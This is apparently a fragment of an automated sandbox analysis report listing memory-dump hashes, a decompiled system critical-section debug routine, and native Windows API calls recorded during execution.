                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: 54ca0428de42786589b5f62d2e032fed164e732a2f82fc2980063ccce7abc785
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: CDC02B70250440FBD7153F34CD01F147258FB40F22F7403547224464F0D52CEC00D100
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 461736e06f9b28ab8263dc2d01c4ff702f3fcc103a744738f358fd8933f63dec
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: 59C08C701411805AEB2E578CCE24B203A5DAF0860EF68099CAA09094A2C36CAC03C218
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 8891f5bbea1a8171a86282e5a26d0304a6161884ab35284033b26d5f7512a9ae
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: 8FB092353019408FCE1ADF18C084B1533E8BB48A40B8400D0E404CBA21D229E8008900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: 73849123b4bdb03c75b38d38a555b98cf24c8ea2bdd05e7005d4d979975eeb7c
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: D6B01232C10441CFCF02EF50C610B197335FB40750F054490900127930C229AC01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 901a3db55da879b3898f57e50915a4d61bead5d8ed45fcf72f16fecf5b1d8fc0
                                          • Instruction ID: c1a5e875edc4b1723fe5df9280ade6f6954ce783fd050f05d62f0398070c98aa
                                          • Opcode Fuzzy Hash: 901a3db55da879b3898f57e50915a4d61bead5d8ed45fcf72f16fecf5b1d8fc0
                                          • Instruction Fuzzy Hash: D59002A161110052D1046199440470640D5A7E1245FD1C012A2184594CC9698C6561A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebb1449c0d5cd84e3dcd6daff85f9f0424bde0c0f0fb4efed8f6e0dc522dea85
                                          • Instruction ID: d4ab29ac862358eafbe06b620cfb68c47d2fea051044354ec99b1c246c3edcb7
                                          • Opcode Fuzzy Hash: ebb1449c0d5cd84e3dcd6daff85f9f0424bde0c0f0fb4efed8f6e0dc522dea85
                                          • Instruction Fuzzy Hash: 059002A160150413D140659948046074095A7D0346FD1C011A2094595ECE698C5571B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d46388f1f97fe6513c3ab483ea7820068193ec26aaed37fc80926901e01ab14
                                          • Instruction ID: a48db841fed9787252fe16a4ea8746a0a6bf63f4db4bedabeb3ca2fcedfa08b6
                                          • Opcode Fuzzy Hash: 9d46388f1f97fe6513c3ab483ea7820068193ec26aaed37fc80926901e01ab14
                                          • Instruction Fuzzy Hash: 0990026170110412D102619944146064099E7D1389FD1C012E1454595DCA658957B1B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75b7b4036dc068d0d8f998b42fe6f627c56fc2035da7bbae0fef4a10c012aeae
                                          • Instruction ID: c06833b598423cc6d3f0fdd9a13c608124ab9f8418a4e231c7a0760d9705203b
                                          • Opcode Fuzzy Hash: 75b7b4036dc068d0d8f998b42fe6f627c56fc2035da7bbae0fef4a10c012aeae
                                          • Instruction Fuzzy Hash: 1590027164110412D141719944046064099B7D0285FD1C012A0454594ECA958A5ABAE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24e509d615ea6fb8fd8c0d7cd35b5d4947f9ec4a596c0ac79055d29593b2d175
                                          • Instruction ID: 8a9627ffb8457fa1f7aa818db3b6a5147e2d65969e5829a5c803ccc0d8499892
                                          • Opcode Fuzzy Hash: 24e509d615ea6fb8fd8c0d7cd35b5d4947f9ec4a596c0ac79055d29593b2d175
                                          • Instruction Fuzzy Hash: EA9002A1A01240534540B199480440690A5B7E13453D1C121A04845A0CCAA88859A2E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc38f7e82bf4f7b853c5f731c22f5da8f9409af2b06e24300bd4387b404a0a4e
                                          • Instruction ID: 090ddf20f08de0898d1af8748a73cfe5bf56c846aef13faf2308f0479203715c
                                          • Opcode Fuzzy Hash: cc38f7e82bf4f7b853c5f731c22f5da8f9409af2b06e24300bd4387b404a0a4e
                                          • Instruction Fuzzy Hash: B290027160154012D1407199844460B9095B7E0345FD1C411E0455594CCA55885AA2A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb790b023217df090d83807b1330234bb89c4d76f842fe45781c691592acf9eb
                                          • Instruction ID: 6b81daa87807c0ccdf3ce87bd996c7a2196bf6bf494afc8af5331e6038d02abb
                                          • Opcode Fuzzy Hash: bb790b023217df090d83807b1330234bb89c4d76f842fe45781c691592acf9eb
                                          • Instruction Fuzzy Hash: CB90026164110812D140719984147074096E7D0645FD1C011A0054594DCA56896976F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 885c42f73cb74ade21978285b1e583db5fbea76a6938e576f2a724a50258b394
                                          • Instruction ID: ac11124b3b13de47a9afea600518b88efb7474b87c5ae840f90e00bb9d87bbdb
                                          • Opcode Fuzzy Hash: 885c42f73cb74ade21978285b1e583db5fbea76a6938e576f2a724a50258b394
                                          • Instruction Fuzzy Hash: CA90026160154452D14062994804B0F8195A7E1246FD1C019A4186594CCD55885967A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65f7f9a57093e2db4d94209d380c42b3caa6e2e306466ed14e40c3bde75caebd
                                          • Instruction ID: 421da2d4a4b0951af8ec3c02ac92e3da989c276073c353b398dfc855791cdf90
                                          • Opcode Fuzzy Hash: 65f7f9a57093e2db4d94209d380c42b3caa6e2e306466ed14e40c3bde75caebd
                                          • Instruction Fuzzy Hash: E490027160150412D100619948087474095A7D0346FD1C011A5194595ECAA5C89575B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bde5ee976b710b44ef7642a5dcc43720ca920bcced3495b05cda703301b1707c
                                          • Instruction ID: 44f0e5b1cbf476eb8c070d4e974fd7ce679ee0894e8bade2090a36b257df69a5
                                          • Opcode Fuzzy Hash: bde5ee976b710b44ef7642a5dcc43720ca920bcced3495b05cda703301b1707c
                                          • Instruction Fuzzy Hash: F790027160110812D104619948046864095A7D0345FD1C011A6054695EDAA5889571B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 725dfd29d8bb323ba679d63413ce4b621115fed4f8425980cebd8249cf11195d
                                          • Instruction ID: 5ed0a5cc061d4e35664f63c91f81a55f763ce10880043509a3d0062c48e36d83
                                          • Opcode Fuzzy Hash: 725dfd29d8bb323ba679d63413ce4b621115fed4f8425980cebd8249cf11195d
                                          • Instruction Fuzzy Hash: B3900271E05100229140719948146468096B7E0785BD5C011A0544594CCD948A5963E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd4b3f7a286fc99d7c0b46c75e45ac1f522daeb783d9068b707fcafbf85408cf
                                          • Instruction ID: d3e8e352635df7f8757503a480879196fcc759812b014b435f00f9b883286713
                                          • Opcode Fuzzy Hash: fd4b3f7a286fc99d7c0b46c75e45ac1f522daeb783d9068b707fcafbf85408cf
                                          • Instruction Fuzzy Hash: B09002E1601240A24500A2998404B0A8595A7E0245BD1C016E10845A0CC9658855A1B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2efc0f64745797c5d94b2a217810733a900f43b624ee66d472dfaf85e688a287
                                          • Instruction ID: da76e36b4e6c14158301fa5011b80f7f87e71ba6be81381a1a3ffbf274992a6e
                                          • Opcode Fuzzy Hash: 2efc0f64745797c5d94b2a217810733a900f43b624ee66d472dfaf85e688a287
                                          • Instruction Fuzzy Hash: 7E900265621100120145A599060450B44D5B7D63953D1C015F14465D0CCA61886963A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: acde6547b550a4c93a9af7d234b052917ba6894b6d304fb0bff9e4819db50816
                                          • Instruction ID: c234d3b4388978ae5cf1b271c706602f24249f8fa3b723399b91258c22be49c7
                                          • Opcode Fuzzy Hash: acde6547b550a4c93a9af7d234b052917ba6894b6d304fb0bff9e4819db50816
                                          • Instruction Fuzzy Hash: FF90027171124412D110619984047064095A7D1245FD1C411A0854598DCAD5889571A2
                                          C-Code - Quality: 53%
                                          			E019EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E0199CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E019E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E019E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019EFDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019EFE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019EFE01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true

                                          Executed Functions

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00AA4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AA4B77,007A002E,00000000,00000060,00000000,00000000), ref: 00AA9D9D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

                                          APIs
                                          • NtReadFile.NTDLL(00AA4D32,5EB6522D,FFFFFFFF,00AA49F1,?,?,00AA4D32,?,00AA49F1,FFFFFFFF,5EB6522D,00AA4D32,?,00000000), ref: 00AA9E45
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00AA4D10,?,?,00AA4D10,00000000,FFFFFFFF), ref: 00AA9EA5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00AA4D32,5EB6522D,FFFFFFFF,00AA49F1,?,?,00AA4D32,?,00AA49F1,FFFFFFFF,5EB6522D,00AA4D32,?,00000000), ref: 00AA9E45
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA9F69
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA9F69
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00AA4D10,?,?,00AA4D10,00000000,FFFFFFFF), ref: 00AA9EA5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e9eaa8c076e03ed8a4f3457f5de38728e28c51ecf1113fc86eba1c4361ffad57
                                          • Instruction ID: a8320730c8bc27f847a864fc315bb9ceee834c266f90353be2e48049af7517fc
                                          • Opcode Fuzzy Hash: e9eaa8c076e03ed8a4f3457f5de38728e28c51ecf1113fc86eba1c4361ffad57
                                          • Instruction Fuzzy Hash: 07900266211000032106A5590704607405AD7D9395351C165F5006551CD661D8B16161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 500e99c3e93e55316d1bcad54fad495a248088f3b88375b2c005c02cfcb9bf5b
                                          • Instruction ID: 8aa155f75ba1166c7fe00a49128743651347e559df5263df59cab10b7802bc51
                                          • Opcode Fuzzy Hash: 500e99c3e93e55316d1bcad54fad495a248088f3b88375b2c005c02cfcb9bf5b
                                          • Instruction Fuzzy Hash: EA90027220108803F1116159840474A4019D7D4345F55C555A8415659D86D5D8E17161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 97b7af890fa8401b68b2b78d014bee24e584018ad2f547aab60952e5fe39113e
                                          • Instruction ID: 75a1a9d1ca066c6cd14cda5dad0492678452f82c477ce543b95d91abb89f27f2
                                          • Opcode Fuzzy Hash: 97b7af890fa8401b68b2b78d014bee24e584018ad2f547aab60952e5fe39113e
                                          • Instruction Fuzzy Hash: FE90027220100843F10161594404B464019D7E4345F51C15AA4115655D8655D8A17561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45bc38401cfe28cf625f3c3acb9c3dbfe6ce003268bab7a671c8fb2c528ce815
                                          • Instruction ID: 21f9672804c2b6c24cd3834a7139ea7004dcc820f35c1d02d92708d7e3528bb3
                                          • Opcode Fuzzy Hash: 45bc38401cfe28cf625f3c3acb9c3dbfe6ce003268bab7a671c8fb2c528ce815
                                          • Instruction Fuzzy Hash: 1D90027220100803F1817159440474A4019D7D5345F91C159A4016655DCA55DAA977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ed64d52f1fff4c54b290fcb676b1ef2dc1182da97debddfcf7dbb5321c4b41b3
                                          • Instruction ID: a862ae578d86e0b63ff3ca0e1bbf7658097f4e47e8861f62352269a642f3c469
                                          • Opcode Fuzzy Hash: ed64d52f1fff4c54b290fcb676b1ef2dc1182da97debddfcf7dbb5321c4b41b3
                                          • Instruction Fuzzy Hash: F090027220504843F14171594404B464029D7D4349F51C155A4055695D9665DDA5B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: da5b0ea1e05753de9a2df08b408f1bc9ba50b740a1aa70a8bde5c54d92a3e08f
                                          • Instruction ID: 55610300171b01a0e253918836afefab8d38fdb024c458d360b2250da3a0c5ad
                                          • Opcode Fuzzy Hash: da5b0ea1e05753de9a2df08b408f1bc9ba50b740a1aa70a8bde5c54d92a3e08f
                                          • Instruction Fuzzy Hash: D290026A21300003F1817159540870A4019D7D5246F91D559A4006559CC955D8B96361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 002d7a876e0e1f0c63dcd643d2a96203360b43e95300e7f25c1fb63d00827848
                                          • Instruction ID: 738db46701496af5d8cfddd2c611a1f7037aa334b4ea44317a2a2fe424c2fe0e
                                          • Opcode Fuzzy Hash: 002d7a876e0e1f0c63dcd643d2a96203360b43e95300e7f25c1fb63d00827848
                                          • Instruction Fuzzy Hash: 0990027231114403F111615984047064019D7D5245F51C555A4815559D86D5D8E17162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 52693cb57312e0077ecbf2797bb58f6c9a6883148157ad5da3ce019b2565749c
                                          • Instruction ID: 1b6b8d7d6a7e643719fcc83886d65ec00c31d111d0e011b58d855673595063f5
                                          • Opcode Fuzzy Hash: 52693cb57312e0077ecbf2797bb58f6c9a6883148157ad5da3ce019b2565749c
                                          • Instruction Fuzzy Hash: FC90027220100403F101659954087464019D7E4345F51D155A9015556EC6A5D8E17171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a1515e182aa16c1d982a44937fa00fac9c45020d734617c274f34ec754487d7a
                                          • Instruction ID: 278ec6072931e7d1eb8c342516b7c0f53dca17f6677dde2a9b1d68359fffb8d1
                                          • Opcode Fuzzy Hash: a1515e182aa16c1d982a44937fa00fac9c45020d734617c274f34ec754487d7a
                                          • Instruction Fuzzy Hash: A890027220100413F11261594504707401DD7D4285F91C556A4415559D9696D9A2B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 53366b76a033f991e0820c6b4959926d658d98fa925667aedcb482fff0ec0c96
                                          • Instruction ID: f379df77ca036d77783035de29d674bf9264be26fab3b1dd3a6f6b89405046de
                                          • Opcode Fuzzy Hash: 53366b76a033f991e0820c6b4959926d658d98fa925667aedcb482fff0ec0c96
                                          • Instruction Fuzzy Hash: 56900262242041537546B1594404607801AE7E4285791C156A5405951C8566E8A6E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 07bb6acc4a8c8c6716e7ea80ff76de712021a59accb3d7544529ddcdabcf0ca0
                                          • Instruction ID: 06e33f9201ed1e13413d0202bc0a38d7655d9d0b6caf3eb16cd13e3e9031b9f8
                                          • Opcode Fuzzy Hash: 07bb6acc4a8c8c6716e7ea80ff76de712021a59accb3d7544529ddcdabcf0ca0
                                          • Instruction Fuzzy Hash: A49002A234100443F10161594414B064019D7E5345F51C159E5055555D8659DCA27166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e1fa1f25d77469adca774e1d9d4c5ae80c431116b87be21a50b28c9fec8704a4
                                          • Instruction ID: 8c6a85ccbf5e9f7e9fa6ed0e7a72fc9f6ad4329f5a986e90de1bf82ec13d7f27
                                          • Opcode Fuzzy Hash: e1fa1f25d77469adca774e1d9d4c5ae80c431116b87be21a50b28c9fec8704a4
                                          • Instruction Fuzzy Hash: 9F9002B220100403F141715944047464019D7D4345F51C155A9055555E8699DDE576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7149b8be3f178b22c49dd1cfbf0e681cb3f1e56f00f89fb185e1015697c9e054
                                          • Instruction ID: e40662176c39b9d371987d016025927492e60ce3bdb3455c34fd91997623c76a
                                          • Opcode Fuzzy Hash: 7149b8be3f178b22c49dd1cfbf0e681cb3f1e56f00f89fb185e1015697c9e054
                                          • Instruction Fuzzy Hash: E090026221180043F20165694C14B074019D7D4347F51C259A4145555CC955D8B16561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93AF8), ref: 00AAA08D
                                          Strings
                                          Memory Dump Source
